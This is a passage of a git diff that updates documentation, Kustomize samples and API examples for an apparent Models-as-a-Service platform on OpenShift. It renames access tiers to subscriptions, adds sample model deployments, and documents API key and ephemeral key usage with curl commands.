### Model Not Available **Problem**: `404 Model Not Found` -**Solution**: Check which models are available in your tier: +**Solution**: Check which models are available in your subscription: ```bash curl -X GET "${MAAS_API_URL}/v1/models" \ - -H "Authorization: Bearer ${ACCESS_TOKEN}" + -H "Authorization: Bearer ${API_KEY}" ``` diff --git a/docs/mkdocs.yml b/docs/mkdocs.yml index e29b46831..ea59224f5 100644 --- a/docs/mkdocs.yml +++ b/docs/mkdocs.yml @@ -41,6 +41,9 @@ theme: name: Switch to dark mode plugins: + - swagger-ui-tag: + docExpansion: list + tryItOutEnabled: true - search: lang: en separator: '[\s\u200b\-_,:!=\[\]()"`/]+|\.(?!\d)|&[lg]t;|(?!\b)(?=[A-Z][a-z])' @@ -48,34 +51,47 @@ plugins: enable_creation_date: true nav: - - Home: index.md - - Quick Start: quickstart.md - - Architecture: architecture.md - - Administrator Guide: + - Home: + - index.md + - Release Notes: release-notes/index.md + - Migration: + - Tier to Subscription: migration/tier-to-subscription.md + - Concepts: + - Architecture: architecture.md + - Access and Quota Overview: configuration-and-management/subscription-overview.md + - MaaS Models: configuration-and-management/maas-models.md + - Install: + - Quick Start: quickstart.md - Prerequisites: - Overview: install/prerequisites.md - Operator Setup: install/platform-setup.md - Installation: - Models-as-a-Service: install/maas-setup.md + - Model Setup (On Cluster): install/model-setup.md - Validation: install/validation.md + - Troubleshooting: install/troubleshooting.md + - Administration Guide: - Configuration & Management: - - Tier Management: configuration-and-management/tier-overview.md - - Tier Configuration: configuration-and-management/tier-configuration.md - - Tier Concepts: configuration-and-management/tier-concepts.md + - Quota and Access Configuration: configuration-and-management/quota-and-access-configuration.md - Token Management: configuration-and-management/token-management.md - TLS Configuration: 
configuration-and-management/tls-configuration.md - - Model Setup: configuration-and-management/model-setup.md - - Model Listing Flow: configuration-and-management/model-listing-flow.md - - MaaSModelRef Kinds (future): configuration-and-management/maas-model-kinds.md - - Known Issues: - - Group Membership: configuration-and-management/group-membership-known-issues.md - - Tier Modification: configuration-and-management/tier-modification-known-issues.md - - Model Access: configuration-and-management/model-access-behavior.md + - Models: + - Model Setup (On Cluster): configuration-and-management/model-setup.md + - Model Listing Flow: configuration-and-management/model-listing-flow.md - Advanced Administration: - Observability: advanced-administration/observability.md - Limitador Persistence: advanced-administration/limitador-persistence.md - - End User Guide: + - Subscription Cardinality: advanced-administration/subscription-cardinality.md + - User Guide: - Self Service Model Access: user-guide/self-service-model-access.md + - API Reference: + - MaaS API Overview: reference/maas-api-overview.md + - MaaS API (Swagger): reference/api-reference.md + - MaaS CRDs: + - MaaSModelRef: reference/crds/maas-model-ref.md + - ExternalModel: reference/crds/external-model.md + - MaaSAuthPolicy: reference/crds/maas-auth-policy.md + - MaaSSubscription: reference/crds/maas-subscription.md extra: version: diff --git a/docs/requirements.txt b/docs/requirements.txt index 97c33b3c5..0779fa20a 100644 --- a/docs/requirements.txt +++ b/docs/requirements.txt @@ -1,4 +1,5 @@ mkdocs>=1.5.0,<2.0 mkdocs-material>=9.0.0 mkdocs-git-revision-date-localized-plugin>=1.2.0 +mkdocs-swagger-ui-tag>=0.7.0 mike>=2.0.0 diff --git a/docs/samples/maas-system/README.md b/docs/samples/maas-system/README.md index b0cff7afc..3a44b40e6 100644 --- a/docs/samples/maas-system/README.md +++ b/docs/samples/maas-system/README.md @@ -2,27 +2,32 @@ Bundled samples that deploy LLMInferenceService + MaaSModelRef + 
MaaSAuthPolicy + MaaSSubscription together so dependencies resolve correctly. LLMInferenceServices reference the existing [models/simulator](../models/simulator) and [models/simulator-premium](../models/simulator-premium) samples. -## Tiers +## Subscriptions -| Tier | Group | Model | Token Limit | -|------|-------|-------|-------------| +| Sample | Group | Model | Token Limit | +|--------|-------|-------|-------------| | **free** | system:authenticated | facebook-opt-125m-simulated | 100/min | | **premium** | premium-user | premium-simulated-simulated-premium | 1000/min | +| **facebook-opt-125m-cpu** | system:authenticated | facebook-opt-125m-cpu-single-node-no-scheduler-cpu | 100/min | +| **qwen3** | system:authenticated | qwen3-single-node-no-scheduler-nvidia-gpu | 100/min | ## Usage To deploy to default namespaces: ```bash -# Create default namespaces if needed +# Create model namespace (models-as-a-service namespace is auto-created by controller) kubectl create namespace llm --dry-run=client -o yaml | kubectl apply -f - -kubectl create namespace models-as-a-service --dry-run=client -o yaml | kubectl apply -f - # Deploy all (LLMIS + MaaS CRs) at once -kustomize build docs/samples/maas-system | kubectl apply -f - +kustomize build docs/samples/maas-system/ | kubectl apply -f - + +# Or deploy a specific sample +kustomize build docs/samples/maas-system/facebook-opt-125m-cpu/ | kubectl apply -f - +kustomize build docs/samples/maas-system/qwen3/ | kubectl apply -f - # Verify -kubectl get maasmodelref -n opendatahub +kubectl get maasmodelref -n llm kubectl get maasauthpolicy,maassubscription -n models-as-a-service kubectl get llminferenceservice -n llm ``` @@ -30,15 +35,15 @@ kubectl get llminferenceservice -n llm To deploy MaaS CRs to another namespace: ```bash -# Create llm and customized namespace if needed +# Create model namespace (custom subscription namespace is auto-created by controller) kubectl create namespace llm --dry-run=client -o yaml | kubectl apply -f 
- -kubectl create namespace my-namespace --dry-run=client -o yaml | kubectl apply -f - +# Note: Configure controller with --maas-subscription-namespace=my-namespace to auto-create custom namespace # Deploy all (LLMIS + MaaS CRs) at once kustomize build docs/samples/maas-system | sed "s/namespace: models-as-a-service/namespace: my-namespace/g" | kubectl apply -f - # Verify -kubectl get maasmodelref -n opendatahub +kubectl get maasmodelref -n llm kubectl get maasauthpolicy,maassubscription -n my-namespace kubectl get llminferenceservice -n llm ``` diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/kustomization.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/kustomization.yaml new file mode 100644 index 000000000..b19766004 --- /dev/null +++ b/docs/samples/maas-system/facebook-opt-125m-cpu/kustomization.yaml @@ -0,0 +1,6 @@ +apiVersion: kustomize.config.k8s.io/v1beta1 +kind: Kustomization + +resources: + - llm + - maas diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/llm/kustomization.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/llm/kustomization.yaml new file mode 100644 index 000000000..749c21764 --- /dev/null +++ b/docs/samples/maas-system/facebook-opt-125m-cpu/llm/kustomization.yaml @@ -0,0 +1,5 @@ +apiVersion: kustomize.config.k8s.io/v1beta1 +kind: Kustomization + +resources: + - ../../../models/facebook-opt-125m-cpu diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/maas/kustomization.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/kustomization.yaml new file mode 100644 index 000000000..e1c827d39 --- /dev/null +++ b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/kustomization.yaml @@ -0,0 +1,9 @@ +apiVersion: kustomize.config.k8s.io/v1beta1 +kind: Kustomization + +namespace: opendatahub + +resources: + - maas-model.yaml + - maas-auth-policy.yaml + - maas-subscription.yaml diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-auth-policy.yaml 
b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-auth-policy.yaml new file mode 100644 index 000000000..490c67fcd --- /dev/null +++ b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-auth-policy.yaml @@ -0,0 +1,12 @@ +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSAuthPolicy +metadata: + name: facebook-opt-125m-cpu-access + namespace: opendatahub +spec: + modelRefs: + - name: facebook-opt-125m-cpu + subjects: + groups: + - name: system:authenticated + users: [] diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-model.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-model.yaml new file mode 100644 index 000000000..9a92b2900 --- /dev/null +++ b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-model.yaml @@ -0,0 +1,10 @@ +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSModelRef +metadata: + name: facebook-opt-125m-cpu + namespace: opendatahub +spec: + modelRef: + kind: LLMInferenceService + name: facebook-opt-125m-cpu-single-node-no-scheduler-cpu + namespace: llm diff --git a/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-subscription.yaml b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-subscription.yaml new file mode 100644 index 000000000..ac0345311 --- /dev/null +++ b/docs/samples/maas-system/facebook-opt-125m-cpu/maas/maas-subscription.yaml @@ -0,0 +1,15 @@ +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSSubscription +metadata: + name: facebook-opt-125m-cpu-subscription + namespace: opendatahub +spec: + owner: + groups: + - name: system:authenticated + users: [] + modelRefs: + - name: facebook-opt-125m-cpu + tokenRateLimits: + - limit: 100 + window: 1m diff --git a/docs/samples/maas-system/free/maas/maas-auth-policy.yaml b/docs/samples/maas-system/free/maas/maas-auth-policy.yaml index 0067b6174..9a8661caf 100644 --- a/docs/samples/maas-system/free/maas/maas-auth-policy.yaml +++ b/docs/samples/maas-system/free/maas/maas-auth-policy.yaml @@ -3,6 +3,9 @@ kind: MaaSAuthPolicy
metadata: name: simulator-access namespace: models-as-a-service + annotations: + openshift.io/display-name: "Simulator Access (Free)" + openshift.io/description: "Grants all authenticated users access to the free-tier simulator model" spec: modelRefs: - name: facebook-opt-125m-simulated diff --git a/docs/samples/maas-system/free/maas/maas-model.yaml b/docs/samples/maas-system/free/maas/maas-model.yaml index be31046df..fccab70c5 100644 --- a/docs/samples/maas-system/free/maas/maas-model.yaml +++ b/docs/samples/maas-system/free/maas/maas-model.yaml @@ -3,6 +3,9 @@ kind: MaaSModelRef metadata: name: facebook-opt-125m-simulated namespace: llm + annotations: + openshift.io/display-name: "Facebook OPT 125M (Simulated)" + openshift.io/description: "A simulated OPT-125M model for free-tier testing" spec: modelRef: kind: LLMInferenceService diff --git a/docs/samples/maas-system/free/maas/maas-subscription.yaml b/docs/samples/maas-system/free/maas/maas-subscription.yaml index 167486d4f..b751a3cc7 100644 --- a/docs/samples/maas-system/free/maas/maas-subscription.yaml +++ b/docs/samples/maas-system/free/maas/maas-subscription.yaml @@ -3,6 +3,9 @@ kind: MaaSSubscription metadata: name: simulator-subscription namespace: models-as-a-service + annotations: + openshift.io/display-name: "Simulator Subscription (Free)" + openshift.io/description: "Free-tier subscription with 100 tokens/min rate limit" spec: owner: groups: @@ -14,3 +17,4 @@ spec: tokenRateLimits: - limit: 100 window: 1m + priority: 10 diff --git a/docs/samples/maas-system/kustomization.yaml b/docs/samples/maas-system/kustomization.yaml index d7b426d3f..c0ff10261 100644 --- a/docs/samples/maas-system/kustomization.yaml +++ b/docs/samples/maas-system/kustomization.yaml @@ -1,12 +1,10 @@ # Bundled MaaS system: LLMInferenceService + MaaSModelRef + MaaSAuthPolicy + MaaSSubscription -# per tier. Deploy all at once so dependencies resolve correctly. +# per subscription. Deploy all at once so dependencies resolve correctly. 
# - free: system:authenticated, 100 tokens/min # - premium: premium-user, 1000 tokens/min -# - unconfigured: no auth/subscription (e2e tests validate 403) apiVersion: kustomize.config.k8s.io/v1beta1 kind: Kustomization resources: - free - premium - - unconfigured diff --git a/docs/samples/maas-system/premium/maas/maas-auth-policy.yaml b/docs/samples/maas-system/premium/maas/maas-auth-policy.yaml index b02112d6f..c44de7d09 100644 --- a/docs/samples/maas-system/premium/maas/maas-auth-policy.yaml +++ b/docs/samples/maas-system/premium/maas/maas-auth-policy.yaml @@ -3,6 +3,9 @@ kind: MaaSAuthPolicy metadata: name: premium-simulator-access namespace: models-as-a-service + annotations: + openshift.io/display-name: "Premium Simulator Access" + openshift.io/description: "Grants premium-user group access to the premium simulator model" spec: modelRefs: - name: premium-simulated-simulated-premium diff --git a/docs/samples/maas-system/premium/maas/maas-model.yaml b/docs/samples/maas-system/premium/maas/maas-model.yaml index 67a97b978..fe30ff8b5 100644 --- a/docs/samples/maas-system/premium/maas/maas-model.yaml +++ b/docs/samples/maas-system/premium/maas/maas-model.yaml @@ -1,10 +1,13 @@ -# MaaSModelRef for the premium-tier simulator. +# MaaSModelRef for the premium subscription simulator. # LLMIS from docs/samples/models/simulator-premium (name: premium-simulated-simulated-premium in namespace llm). 
apiVersion: maas.opendatahub.io/v1alpha1 kind: MaaSModelRef metadata: name: premium-simulated-simulated-premium namespace: llm + annotations: + openshift.io/display-name: "Premium Simulator" + openshift.io/description: "A simulated model for premium-tier testing" spec: modelRef: kind: LLMInferenceService diff --git a/docs/samples/maas-system/premium/maas/maas-subscription.yaml b/docs/samples/maas-system/premium/maas/maas-subscription.yaml index 56452770c..b60d0abbc 100644 --- a/docs/samples/maas-system/premium/maas/maas-subscription.yaml +++ b/docs/samples/maas-system/premium/maas/maas-subscription.yaml @@ -3,6 +3,9 @@ kind: MaaSSubscription metadata: name: premium-simulator-subscription namespace: models-as-a-service + annotations: + openshift.io/display-name: "Premium Simulator Subscription" + openshift.io/description: "Premium-tier subscription with 1000 tokens/min rate limit" spec: owner: groups: @@ -14,3 +17,4 @@ spec: tokenRateLimits: - limit: 1000 window: 1m + priority: 20 diff --git a/docs/samples/maas-system/qwen3/kustomization.yaml b/docs/samples/maas-system/qwen3/kustomization.yaml new file mode 100644 index 000000000..b19766004 --- /dev/null +++ b/docs/samples/maas-system/qwen3/kustomization.yaml @@ -0,0 +1,6 @@ +apiVersion: kustomize.config.k8s.io/v1beta1 +kind: Kustomization + +resources: + - llm + - maas diff --git a/docs/samples/maas-system/qwen3/llm/kustomization.yaml b/docs/samples/maas-system/qwen3/llm/kustomization.yaml new file mode 100644 index 000000000..f53aeed60 --- /dev/null +++ b/docs/samples/maas-system/qwen3/llm/kustomization.yaml @@ -0,0 +1,5 @@ +apiVersion: kustomize.config.k8s.io/v1beta1 +kind: Kustomization + +resources: + - ../../../models/qwen3 diff --git a/docs/samples/maas-system/qwen3/maas/kustomization.yaml b/docs/samples/maas-system/qwen3/maas/kustomization.yaml new file mode 100644 index 000000000..e1c827d39 --- /dev/null +++ b/docs/samples/maas-system/qwen3/maas/kustomization.yaml @@ -0,0 +1,9 @@ +apiVersion: 
kustomize.config.k8s.io/v1beta1 +kind: Kustomization + +namespace: opendatahub + +resources: + - maas-model.yaml + - maas-auth-policy.yaml + - maas-subscription.yaml diff --git a/docs/samples/maas-system/qwen3/maas/maas-auth-policy.yaml b/docs/samples/maas-system/qwen3/maas/maas-auth-policy.yaml new file mode 100644 index 000000000..a8c193df5 --- /dev/null +++ b/docs/samples/maas-system/qwen3/maas/maas-auth-policy.yaml @@ -0,0 +1,12 @@ +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSAuthPolicy +metadata: + name: qwen3-access + namespace: opendatahub +spec: + modelRefs: + - name: qwen3 + subjects: + groups: + - name: system:authenticated + users: [] diff --git a/docs/samples/maas-system/qwen3/maas/maas-model.yaml b/docs/samples/maas-system/qwen3/maas/maas-model.yaml new file mode 100644 index 000000000..42cb360b6 --- /dev/null +++ b/docs/samples/maas-system/qwen3/maas/maas-model.yaml @@ -0,0 +1,10 @@ +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSModelRef +metadata: + name: qwen3 + namespace: opendatahub +spec: + modelRef: + kind: LLMInferenceService + name: qwen3-single-node-no-scheduler-nvidia-gpu + namespace: llm diff --git a/docs/samples/maas-system/qwen3/maas/maas-subscription.yaml b/docs/samples/maas-system/qwen3/maas/maas-subscription.yaml new file mode 100644 index 000000000..a4ac4145c --- /dev/null +++ b/docs/samples/maas-system/qwen3/maas/maas-subscription.yaml @@ -0,0 +1,15 @@ +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSSubscription +metadata: + name: qwen3-subscription + namespace: opendatahub +spec: + owner: + groups: + - name: system:authenticated + users: [] + modelRefs: + - name: qwen3 + tokenRateLimits: + - limit: 100 + window: 1m diff --git a/docs/samples/models/README.md b/docs/samples/models/README.md index a867588eb..3fa3d4981 100644 --- a/docs/samples/models/README.md +++ b/docs/samples/models/README.md @@ -2,12 +2,12 @@ This directory contains `LLMInferenceService`s for deploying sample models.
Please refer to the [deployment guide](../../content/quickstart.md) for more details on how to test the MaaS Platform with these models. -> **TODO (ODH model controller):** Update the ODH model controller to remove or modify the existing webhook that validates tier annotations (`alpha.maas.opendatahub.io/tiers`). The webhook currently blocks HTTPRoutes when AuthPolicy is not enforced (e.g., Kuadrant not installed), requiring `security.opendatahub.io/enable-auth=false`. For MaaS-managed models, tier/access control is handled by MaaSAuthPolicy and MaaSSubscription rather than LLMInferenceService annotations. The webhook should not apply automation or block models that are managed by MaaS. See JIRA: [TBD] +> **TODO (ODH model controller):** Update the ODH model controller to remove or modify the existing webhook that validates access annotations (`alpha.maas.opendatahub.io/tiers`). The webhook currently blocks HTTPRoutes when AuthPolicy is not enforced (e.g., Kuadrant not installed), requiring `security.opendatahub.io/enable-auth=false`. For MaaS-managed models, access control is handled by MaaSAuthPolicy and MaaSSubscription rather than LLMInferenceService annotations. The webhook should not apply automation or block models that are managed by MaaS. 
See JIRA: [TBD] ## Available Models - **simulator** - Simple simulator for testing -- **simulator-premium** - Premium simulator for testing tier-based access (configured via MaaSAuthPolicy) +- **simulator-premium** - Premium simulator for testing subscription-based access (configured via MaaSAuthPolicy) - **facebook-opt-125m-cpu** - Facebook OPT 125M model (CPU-based) - **qwen3** - Qwen3 model (GPU-based with autoscaling) - **ibm-granite-2b-gpu** - IBM Granite 2B Instruct model (GPU-based, supports instructions) @@ -55,7 +55,7 @@ The two simulator models can be distinguished by: - Standard: `facebook-opt-125m-simulated` - Premium: `premium-simulated-simulated-premium` -Tier-based access is configured via MaaSAuthPolicy and MaaSSubscription (see [docs/samples/maas-system/](../maas-system/)), not via LLMInferenceService annotations. +Subscription-based access is configured via MaaSAuthPolicy and MaaSSubscription (see [docs/samples/maas-system/](../maas-system/)), not via LLMInferenceService annotations. 
### Verifying Deployment diff --git a/docs/samples/models/e2e-distinct-2-simulated/kustomization.yaml b/docs/samples/models/e2e-distinct-2-simulated/kustomization.yaml new file mode 100644 index 000000000..02fc82420 --- /dev/null +++ b/docs/samples/models/e2e-distinct-2-simulated/kustomization.yaml @@ -0,0 +1,7 @@ +apiVersion: kustomize.config.k8s.io/v1beta1 +kind: Kustomization + +namespace: llm + +resources: + - model.yaml diff --git a/docs/samples/models/e2e-distinct-2-simulated/model.yaml b/docs/samples/models/e2e-distinct-2-simulated/model.yaml new file mode 100644 index 000000000..0821d0cb1 --- /dev/null +++ b/docs/samples/models/e2e-distinct-2-simulated/model.yaml @@ -0,0 +1,65 @@ +apiVersion: serving.kserve.io/v1alpha1 +kind: LLMInferenceService +metadata: + name: e2e-distinct-2-simulated +spec: + model: + uri: hf://sshleifer/tiny-gpt2 # ~2MB test model, simulator ignores it anyway + name: test/e2e-distinct-model-2 + replicas: 1 + router: + route: {} + # Connect to MaaS-enabled gateway + gateway: + refs: + - name: maas-default-gateway + namespace: openshift-ingress + template: + containers: + - name: main + image: "ghcr.io/llm-d/llm-d-inference-sim:v0.7.1" + imagePullPolicy: Always + command: ["/app/llm-d-inference-sim"] + args: + - --port + - "8000" + - --model + - test/e2e-distinct-model-2 + - --mode + - random + - --ssl-certfile + - /var/run/kserve/tls/tls.crt + - --ssl-keyfile + - /var/run/kserve/tls/tls.key + env: + - name: POD_NAME + valueFrom: + fieldRef: + apiVersion: v1 + fieldPath: metadata.name + - name: POD_NAMESPACE + valueFrom: + fieldRef: + apiVersion: v1 + fieldPath: metadata.namespace + ports: + - name: https + containerPort: 8000 + protocol: TCP + livenessProbe: + httpGet: + path: /health + port: https + scheme: HTTPS + resources: + requests: + cpu: 100m + memory: 256Mi + limits: + cpu: 500m + memory: 512Mi + readinessProbe: + httpGet: + path: /ready + port: https + scheme: HTTPS diff --git 
a/docs/samples/models/e2e-distinct-simulated/kustomization.yaml b/docs/samples/models/e2e-distinct-simulated/kustomization.yaml new file mode 100644 index 000000000..02fc82420 --- /dev/null +++ b/docs/samples/models/e2e-distinct-simulated/kustomization.yaml @@ -0,0 +1,7 @@ +apiVersion: kustomize.config.k8s.io/v1beta1 +kind: Kustomization + +namespace: llm + +resources: + - model.yaml diff --git a/docs/samples/models/e2e-distinct-simulated/model.yaml b/docs/samples/models/e2e-distinct-simulated/model.yaml new file mode 100644 index 000000000..4e1164b9a --- /dev/null +++ b/docs/samples/models/e2e-distinct-simulated/model.yaml @@ -0,0 +1,65 @@ +apiVersion: serving.kserve.io/v1alpha1 +kind: LLMInferenceService +metadata: + name: e2e-distinct-simulated +spec: + model: + uri: hf://sshleifer/tiny-gpt2 # ~2MB test model, simulator ignores it anyway + name: test/e2e-distinct-model + replicas: 1 + router: + route: {} + # Connect to MaaS-enabled gateway + gateway: + refs: + - name: maas-default-gateway + namespace: openshift-ingress + template: + containers: + - name: main + image: "ghcr.io/llm-d/llm-d-inference-sim:v0.7.1" + imagePullPolicy: Always + command: ["/app/llm-d-inference-sim"] + args: + - --port + - "8000" + - --model + - test/e2e-distinct-model + - --mode + - random + - --ssl-certfile + - /var/run/kserve/tls/tls.crt + - --ssl-keyfile + - /var/run/kserve/tls/tls.key + env: + - name: POD_NAME + valueFrom: + fieldRef: + apiVersion: v1 + fieldPath: metadata.name + - name: POD_NAMESPACE + valueFrom: + fieldRef: + apiVersion: v1 + fieldPath: metadata.namespace + ports: + - name: https + containerPort: 8000 + protocol: TCP + livenessProbe: + httpGet: + path: /health + port: https + scheme: HTTPS + resources: + requests: + cpu: 100m + memory: 256Mi + limits: + cpu: 500m + memory: 512Mi + readinessProbe: + httpGet: + path: /ready + port: https + scheme: HTTPS diff --git a/docs/samples/models/simulator-premium/kustomization.yaml 
b/docs/samples/models/simulator-premium/kustomization.yaml index 187432c12..c5c6cde6c 100644 --- a/docs/samples/models/simulator-premium/kustomization.yaml +++ b/docs/samples/models/simulator-premium/kustomization.yaml @@ -2,7 +2,7 @@ apiVersion: kustomize.config.k8s.io/v1beta1 kind: Kustomization metadata: - name: premium-tier-simulated-model + name: premium-simulated-model namespace: llm diff --git a/maas-api/README.md b/maas-api/README.md index dda633c5f..ad4934855 100644 --- a/maas-api/README.md +++ b/maas-api/README.md @@ -151,7 +151,7 @@ kustomize build ${PROJECT_DIR}/docs/samples/models/simulator | kubectl apply --s MaaS API supports two types of tokens: 1. **Ephemeral Tokens** - Stateless tokens that provide better security posture as they can be easily refreshed by the caller using OpenShift Identity. These tokens can live as long as API keys (up to the configured expiration), making them suitable for both temporary and long-term access scenarios. -2. **API Keys** - Named, long-lived tokens for applications (stored in SQLite database). Suitable for services or applications that need persistent access with metadata tracking. +2. **API Keys** - Named, long-lived tokens for applications (stored in PostgreSQL database). Suitable for services or applications that need persistent access with metadata tracking. ##### Ephemeral Tokens @@ -181,34 +181,36 @@ TOKEN=$(echo $TOKEN_RESPONSE | jq -r .token) ##### API Keys -The API uses hash-based API keys with OpenAI-compatible format (`sk-oai-*`). These keys support both permanent and expiring modes. +The API uses hash-based API keys with OpenAI-compatible format (`sk-oai-*`). Keys expire after a configurable duration (default: 90 days via `API_KEY_MAX_EXPIRATION_DAYS`). 
```shell HOST="$(kubectl get gateway -l app.kubernetes.io/instance=maas-default-gateway -n openshift-ingress -o jsonpath='{.items[0].status.addresses[0].value}')" -# Create a permanent API key (no expiration) +# Create an API key (defaults to API_KEY_MAX_EXPIRATION_DAYS, typically 90 days) API_KEY_RESPONSE=$(curl -sSk \ -H "Authorization: Bearer $(oc whoami -t)" \ -H "Content-Type: application/json" \ -X POST \ -d '{ - "name": "my-permanent-key", - "description": "Production API key for my application" + "name": "my-api-key", + "description": "Production API key for my application", + "subscription": "simulator-subscription" }' \ "${HOST}/maas-api/v1/api-keys") echo $API_KEY_RESPONSE | jq -r . API_KEY=$(echo $API_KEY_RESPONSE | jq -r .key) -# Create an expiring API key (90 days) +# Create an API key with custom expiration (30 days) API_KEY_RESPONSE=$(curl -sSk \ -H "Authorization: Bearer $(oc whoami -t)" \ -H "Content-Type: application/json" \ -X POST \ -d '{ - "name": "my-expiring-key", - "description": "90-day test key", - "expiresIn": "90d" + "name": "my-short-lived-key", + "description": "30-day test key", + "expiresIn": "30d", + "subscription": "simulator-subscription" }' \ "${HOST}/maas-api/v1/api-keys") @@ -216,19 +218,25 @@ echo $API_KEY_RESPONSE | jq -r . API_KEY=$(echo $API_KEY_RESPONSE | jq -r .key) ``` +> [!NOTE] +> Replace `simulator-subscription` with your `MaaSSubscription` metadata name. To rely on **auto-selection** instead, remove the `subscription` field; maas-api then picks the accessible subscription with the highest `spec.priority`. + > [!IMPORTANT] > The plaintext API key is shown ONLY ONCE at creation time. Store it securely - it cannot be retrieved again. **Managing API Keys:** ```shell -# List all your API keys +# Search your API keys curl -sSk \ -H "Authorization: Bearer $(oc whoami -t)" \ - "${HOST}/maas-api/v1/api-keys" | jq . + -H "Content-Type: application/json" \ + -X POST \ + -d '{}' \ + "${HOST}/maas-api/v1/api-keys/search" | jq . 
# Get specific API key by ID -API_KEY_ID="" +API_KEY_ID="" curl -sSk \ -H "Authorization: Bearer $(oc whoami -t)" \ "${HOST}/maas-api/v1/api-keys/${API_KEY_ID}" | jq . @@ -243,6 +251,55 @@ curl -sSk \ > [!NOTE] > API keys use hash-based storage (only SHA-256 hash stored, never plaintext). They are OpenAI-compatible (sk-oai-* format) and support optional expiration. API keys are stored in the configured database (see [Storage Configuration](#storage-configuration)) with metadata including creation date, expiration date, and status. +##### Ephemeral API Keys + +Ephemeral keys are short-lived programmatic keys designed for temporary access scenarios. They differ from regular API keys in several ways: + +| Feature | Regular API Keys | Ephemeral API Keys | +|---------|------------------|-------------------| +| Default expiration | 90 days | 1 hour | +| Maximum expiration | 90 days (configurable) | 1 hour (enforced) | +| Name | Required | Optional (auto-generated if not provided) | +| Shown in list/search | Yes | No (excluded by default) | +| Use case | Long-term application access | Short-term programmatic access | + +```shell +# Create an ephemeral key (1-hour default expiration, name auto-generated) +API_KEY_RESPONSE=$(curl -sSk \ + -H "Authorization: Bearer $(oc whoami -t)" \ + -H "Content-Type: application/json" \ + -X POST \ + -d '{"ephemeral": true}' \ + "${HOST}/maas-api/v1/api-keys") + +echo $API_KEY_RESPONSE | jq -r . 
+API_KEY=$(echo $API_KEY_RESPONSE | jq -r .key) + +# Create an ephemeral key with custom name and expiration (max 1hr) +API_KEY_RESPONSE=$(curl -sSk \ + -H "Authorization: Bearer $(oc whoami -t)" \ + -H "Content-Type: application/json" \ + -X POST \ + -d '{ + "ephemeral": true, + "name": "playground-session", + "expiresIn": "30m" + }' \ + "${HOST}/maas-api/v1/api-keys") +``` + +To include ephemeral keys in search results, use the `includeEphemeral` filter: + +```shell +# Search including ephemeral keys +curl -sSk \ + -H "Authorization: Bearer $(oc whoami -t)" \ + -H "Content-Type: application/json" \ + -X POST \ + -d '{"filters": {"includeEphemeral": true}}' \ + "${HOST}/maas-api/v1/api-keys/search" | jq . +``` + ### Database Configuration maas-api uses PostgreSQL for persistent storage of API key metadata. The database connection is configured via a Kubernetes Secret. @@ -252,16 +309,60 @@ maas-api uses PostgreSQL for persistent storage of API key metadata. The databas For production deployments, see the [Database Prerequisites](../docs/content/install/prerequisites.md#database-prerequisite) guide. +#### Listing models with subscription filtering + +The `/v1/models` endpoint supports subscription filtering and aggregation. Use an **OpenShift token** or an **API key** in `Authorization: Bearer`. With a **user token**, optional `X-MaaS-Subscription` filters to one subscription when you have access to several. With an **API key**, the subscription is fixed at key mint time—no client `X-MaaS-Subscription` is needed for listing. + + HOST="$(kubectl get gateway -l app.kubernetes.io/instance=maas-default-gateway -n openshift-ingress -o jsonpath='{.items[0].status.addresses[0].value}')" + + # List models from all accessible subscriptions + curl ${HOST}/v1/models \ + -H "Content-Type: application/json" \ + -H "Authorization: Bearer $TOKEN" | jq . 
+ + # List models from a specific subscription + curl ${HOST}/v1/models \ + -H "Content-Type: application/json" \ + -H "Authorization: Bearer $TOKEN" \ + -H "X-MaaS-Subscription: my-subscription" | jq . + + # List models from the subscription bound to an API key + curl ${HOST}/v1/models \ + -H "Content-Type: application/json" \ + -H "Authorization: Bearer $API_KEY" | jq . + +**Subscription Aggregation**: When the same model (same ID and URL) is accessible via multiple subscriptions, it appears once in the response with an array of all subscriptions providing access: + + { + "object": "list", + "data": [ + { + "id": "model-name", + "url": "https://...", + "subscriptions": [ + {"name": "subscription-a", "displayName": "Subscription A"}, + {"name": "subscription-b", "displayName": "Subscription B"} + ] + } + ] + } + #### Calling the model and hitting the rate limit -Using model discovery: +Inference requires an API key (mint with `POST /v1/api-keys` using your OpenShift token). Send **only** `Authorization: Bearer <API_KEY>`; subscription is taken from the key at mint time. + +Using model discovery (maas-api URL matches the [validation guide](../docs/content/install/validation.md); model `url` values come from the list response): ```shell -HOST="$(kubectl get gateway -l app.kubernetes.io/instance=maas-default-gateway -n openshift-ingress -o jsonpath='{.items[0].status.addresses[0].value}')" +CLUSTER_DOMAIN=$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}') +MAAS_API="https://maas.${CLUSTER_DOMAIN}/maas-api" +API_KEY=$(curl -sSk -H "Authorization: Bearer $(oc whoami -t)" -H "Content-Type: application/json" \ + -X POST -d '{"name":"rate-limit-demo","subscription":"simulator-subscription"}' \ + "${MAAS_API}/v1/api-keys" | jq -r .key) -MODELS=$(curl ${HOST}/v1/models \ +MODELS=$(curl -sSk "${MAAS_API}/v1/models" \ -H "Content-Type: application/json" \ - -H "Authorization: Bearer $TOKEN" | jq . -r) + -H "Authorization: Bearer ${API_KEY}" | jq .
